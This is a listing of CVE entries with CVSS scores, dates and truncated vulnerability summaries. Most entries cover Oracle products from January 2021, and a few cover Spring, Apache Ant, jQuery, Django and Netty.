Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
28-01-2021 - 18:37 20-01-2021 - 15:15
CVE-2021-2131 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:37 20-01-2021 - 15:15
CVE-2021-2130 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:36 20-01-2021 - 15:15
CVE-2021-2129 3.6
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:36 20-01-2021 - 15:15
CVE-2021-2128 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure
27-01-2021 - 22:36 20-01-2021 - 15:15
CVE-2021-2126 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:35 20-01-2021 - 15:15
CVE-2021-2109 6.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high
27-01-2021 - 22:33 20-01-2021 - 15:15
CVE-2021-2111 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:33 20-01-2021 - 15:15
CVE-2021-2086 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:33 20-01-2021 - 15:15
CVE-2021-2112 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:32 20-01-2021 - 15:15
CVE-2021-2121 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:30 20-01-2021 - 15:15
CVE-2021-2120 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:30 20-01-2021 - 15:15
CVE-2021-2074 4.6
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:40 20-01-2021 - 15:15
CVE-2021-2073 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:34 20-01-2021 - 15:15
CVE-2021-2127 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:32 20-01-2021 - 15:15
CVE-2021-2124 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:19 20-01-2021 - 15:15
CVE-2021-2057 6.5
Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Internal Operations). The supported version that is affected is 19.0. Easily exploitable vulnerability allows low pri
26-01-2021 - 20:04 20-01-2021 - 15:15
CVE-2021-2062 4.9
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Server). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged at
26-01-2021 - 19:55 20-01-2021 - 15:15
CVE-2021-2059 5.0
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Web interface). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
26-01-2021 - 19:36 20-01-2021 - 15:15
CVE-2021-2054 6.5
Vulnerability in the RDBMS Sharding component of Oracle Database Server. Supported versions that are affected are 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any Procedure, Create Any View, Cr
26-01-2021 - 19:28 20-01-2021 - 15:15
CVE-2021-2052 5.0
Vulnerability in the JD Edwards EnterpriseOne Orchestrator product of Oracle JD Edwards (component: E1 IOT Orchestrator Security). The supported version that is affected is Prior to 9.2.5.1. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 18:41 20-01-2021 - 15:15
CVE-2021-2123 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
26-01-2021 - 18:21 20-01-2021 - 15:15
CVE-2021-2118 5.8
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacke
26-01-2021 - 18:06 20-01-2021 - 15:15
CVE-2021-2117 4.9
Vulnerability in the Oracle Application Express Survey Builder component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account pri
26-01-2021 - 17:29 20-01-2021 - 15:15
CVE-2021-2116 4.9
Vulnerability in the Oracle Application Express Opportunity Tracker component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Accoun
26-01-2021 - 17:09 20-01-2021 - 15:15
CVE-2021-2115 4.9
Vulnerability in the Oracle Common Applications Calendar product of Oracle E-Business Suite (component: Tasks). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker
26-01-2021 - 16:44 20-01-2021 - 15:15
CVE-2021-2050 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low p
26-01-2021 - 16:29 20-01-2021 - 15:15
CVE-2021-2051 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low p
26-01-2021 - 16:21 20-01-2021 - 15:15
CVE-2021-2114 5.8
Vulnerability in the Oracle Common Applications Calendar product of Oracle E-Business Suite (component: Applications Calendar). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthe
26-01-2021 - 16:14 20-01-2021 - 15:15
CVE-2021-2113 4.0
Vulnerability in the Oracle Financial Services Revenue Management and Billing product of Oracle Financial Services Applications (component: On Demand Billing). Supported versions that are affected are 2.9.0.0 and 2.9.0.1. Easily exploitable vulnerabi
26-01-2021 - 16:00 20-01-2021 - 15:15
CVE-2021-2110 4.0
Vulnerability in the Oracle Argus Safety product of Oracle Health Sciences Applications (component: Letters). The supported version that is affected is 8.2.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTT
26-01-2021 - 15:53 20-01-2021 - 15:15
CVE-2021-2049 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Administration). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privilege
26-01-2021 - 15:21 20-01-2021 - 15:15
CVE-2021-2099 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network a
26-01-2021 - 15:17 20-01-2021 - 15:15
CVE-2021-2102 5.8
Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 15:17 20-01-2021 - 15:15
CVE-2021-2108 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). The supported version that is affected is 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access v
26-01-2021 - 15:11 20-01-2021 - 15:15
CVE-2021-2107 5.8
Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticate
26-01-2021 - 15:07 20-01-2021 - 15:15
CVE-2021-2106 5.8
Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticate
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2105 5.8
Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticate
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2103 5.8
Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2104 5.8
Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2034 5.8
Vulnerability in the Oracle Common Applications Calendar product of Oracle E-Business Suite (component: Tasks). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network acce
25-01-2021 - 21:50 20-01-2021 - 15:15
CVE-2021-2035 6.5
Vulnerability in the RDBMS Scheduler component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Export Full Database privilege
25-01-2021 - 21:47 20-01-2021 - 15:15
CVE-2021-2039 4.9
Vulnerability in the Siebel Core - Server Framework product of Oracle Siebel CRM (component: Search). Supported versions that are affected are 20.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via HT
25-01-2021 - 21:45 20-01-2021 - 15:15
CVE-2021-2040 5.8
Vulnerability in the Oracle Argus Safety product of Oracle Health Sciences Applications (component: Case Form, Local Affiliate Form). The supported version that is affected is 8.2.2. Easily exploitable vulnerability allows unauthenticated attacker wi
25-01-2021 - 21:39 20-01-2021 - 15:15
CVE-2021-2041 6.8
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Difficult to exploit vulnerability allows unauthen
25-01-2021 - 21:30 20-01-2021 - 15:15
CVE-2021-2043 5.8
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network acces
25-01-2021 - 21:11 20-01-2021 - 15:15
CVE-2021-2044 4.0
Vulnerability in the PeopleSoft Enterprise FIN Payables product of Oracle PeopleSoft (component: Financial Sanctions). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access
25-01-2021 - 21:08 20-01-2021 - 15:15
CVE-2021-2094 5.8
Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attack
25-01-2021 - 21:06 20-01-2021 - 15:15
CVE-2021-2100 6.4
Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attack
25-01-2021 - 21:03 20-01-2021 - 15:15
CVE-2021-2101 6.4
Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attack
25-01-2021 - 20:58 20-01-2021 - 15:15
CVE-2021-2096 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
25-01-2021 - 20:57 20-01-2021 - 15:15
CVE-2021-2097 5.8
Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Profile). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network acc
25-01-2021 - 20:54 20-01-2021 - 15:15
CVE-2021-2045 3.5
Vulnerability in the Oracle Text component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Session privilege with net
25-01-2021 - 20:54 20-01-2021 - 15:15
CVE-2021-2098 5.8
Vulnerability in the Oracle Email Center product of Oracle E-Business Suite (component: Message Display). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with
25-01-2021 - 20:52 20-01-2021 - 15:15
CVE-2021-2025 5.8
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable
25-01-2021 - 19:59 20-01-2021 - 15:15
CVE-2021-2026 5.8
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacke
25-01-2021 - 19:55 20-01-2021 - 15:15
CVE-2021-2027 5.8
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacke
25-01-2021 - 19:51 20-01-2021 - 15:15
CVE-2021-2033 4.0
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows low priv
25-01-2021 - 19:47 20-01-2021 - 15:15
CVE-2021-2089 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Runtime Catalog). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with netwo
25-01-2021 - 19:45 20-01-2021 - 15:15
CVE-2021-2091 5.8
Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Miscellaneous). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with netw
25-01-2021 - 19:44 20-01-2021 - 15:15
CVE-2021-2090 5.8
Vulnerability in the Oracle Email Center product of Oracle E-Business Suite (component: Message Display). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with
25-01-2021 - 19:44 20-01-2021 - 15:15
CVE-2021-2092 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wit
25-01-2021 - 19:42 20-01-2021 - 15:15
CVE-2021-2093 5.8
Vulnerability in the Oracle Common Applications product of Oracle E-Business Suite (component: CRM User Management Framework). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthen
25-01-2021 - 19:42 20-01-2021 - 15:15
CVE-2021-2018 5.1
Vulnerability in the Advanced Networking Option component of Oracle Database Server. Supported versions that are affected are 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compro
25-01-2021 - 17:32 20-01-2021 - 15:15
CVE-2021-2084 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wit
25-01-2021 - 17:29 20-01-2021 - 15:15
CVE-2021-2085 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wit
25-01-2021 - 17:23 20-01-2021 - 15:15
CVE-2021-2023 4.3
Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: APIs). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network a
25-01-2021 - 17:06 20-01-2021 - 15:15
CVE-2021-2068 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 16:06 20-01-2021 - 15:15
CVE-2021-2069 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 16:00 20-01-2021 - 15:15
CVE-2021-2071 6.8
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Elastic Search). Supported versions that are affected are 8.56, 8.57 and 8.58. Difficult to exploit vulnerability allows unauthenticated attacker with net
25-01-2021 - 15:56 20-01-2021 - 15:15
CVE-2021-2017 4.0
Vulnerability in the Oracle User Management product of Oracle E-Business Suite (component: Proxy User Delegation). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker wit
25-01-2021 - 15:54 20-01-2021 - 15:15
CVE-2021-2075 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Samples). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unau
25-01-2021 - 15:47 20-01-2021 - 15:15
CVE-2021-2077 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
25-01-2021 - 15:43 20-01-2021 - 15:15
CVE-2021-2078 5.8
Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to
25-01-2021 - 15:37 20-01-2021 - 15:15
CVE-2021-2080 5.8
Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to
25-01-2021 - 15:33 20-01-2021 - 15:15
CVE-2021-2082 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
25-01-2021 - 15:33 20-01-2021 - 15:15
CVE-2021-2079 5.8
Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to
25-01-2021 - 15:33 20-01-2021 - 15:15
CVE-2021-2083 5.8
Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: User Responsibilities). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wi
25-01-2021 - 15:31 20-01-2021 - 15:15
CVE-2021-2015 5.8
Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Worklist). Supported versions that are affected are 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to c
25-01-2021 - 15:23 20-01-2021 - 15:15
CVE-2021-2063 4.6
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with logon to the
25-01-2021 - 14:22 20-01-2021 - 15:15
CVE-2021-2064 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). The supported version that is affected is 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access v
25-01-2021 - 14:20 20-01-2021 - 15:15
CVE-2021-2066 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 14:18 20-01-2021 - 15:15
CVE-2021-2004 4.0
Vulnerability in the Siebel Core - Server BizLogic Script product of Oracle Siebel CRM (component: Integration - Scripting). Supported versions that are affected are 20.12 and prior. Easily exploitable vulnerability allows low privileged attacker wit
25-01-2021 - 14:17 20-01-2021 - 15:15
CVE-2021-2067 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 14:17 20-01-2021 - 15:15
CVE-2021-2029 7.5
Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Miscellaneous). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.8. Easily exploitable vulnerability allows unauthenticated attacker with netwo
23-01-2021 - 00:34 20-01-2021 - 15:15
CVE-2021-2013 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low pr
22-01-2021 - 19:18 20-01-2021 - 15:15
CVE-2021-1994 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with netwo
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2005 4.3
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: BI Platform Security). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows un
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2000 3.5
Vulnerability in the Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having SYS Account privilege with netwo
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1997 5.5
Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Report). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker wit
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1999 1.2
Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: RAS subsystems). The supported version that is affected is 8.8. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastru
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2003 4.9
Vulnerability in the Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Dashboards). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vul
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1996 3.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows high privileged attacker with netwo
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1993 2.1
Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Session privilege with network
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1995 4.0
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows low privileged attacker with networ
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2043 None
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network acces
20-01-2021 - 15:15 20-01-2021 - 15:15
CVE-2017-8028 5.1
In Pivotal Spring-LDAP versions 1.3.0 - 2.3.1, when connected to some LDAP servers, when no additional attributes are bound, and when using LDAP BindAuthenticator with org.springframework.ldap.core.support.DefaultTlsDirContextAuthenticationStrategy a
20-01-2021 - 15:15 27-11-2017 - 10:29
CVE-2020-11979 5.0
As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without
01-10-2020 - 20:15 01-10-2020 - 20:15
CVE-2020-11023 4.3
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may ex
01-10-2020 - 00:15 29-04-2020 - 21:15
CVE-2020-1945 3.3
Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files fr
30-09-2020 - 21:15 14-05-2020 - 16:15
CVE-2020-5421 6.5
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jses
30-09-2020 - 16:46 19-09-2020 - 04:15
CVE-2020-24750 6.8
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
30-09-2020 - 13:48 17-09-2020 - 19:15
CVE-2020-1968 4.3
The Raccoon attack exploits a flaw in the TLS specification which can lead to an attacker being able to compute the pre-master secret in connections which have used a Diffie-Hellman (DH) based ciphersuite. In such a case this would result in the atta
26-09-2020 - 00:15 09-09-2020 - 14:15
CVE-2020-24584 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). The intermediate-level directories of the filesystem cache had the system's standard umask rather than 0o077.
25-09-2020 - 20:15 01-09-2020 - 13:15
CVE-2020-24583 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). FILE_UPLOAD_DIRECTORY_PERMISSIONS mode was not applied to intermediate-level directories created in the process of uploading file
25-09-2020 - 20:15 01-09-2020 - 13:15
CVE-2020-11612 7.5
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free m
25-09-2020 - 20:15 07-04-2020 - 18:15
CVE-2020-11022 4.3
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This prob
25-09-2020 - 20:15 29-04-2020 - 22:15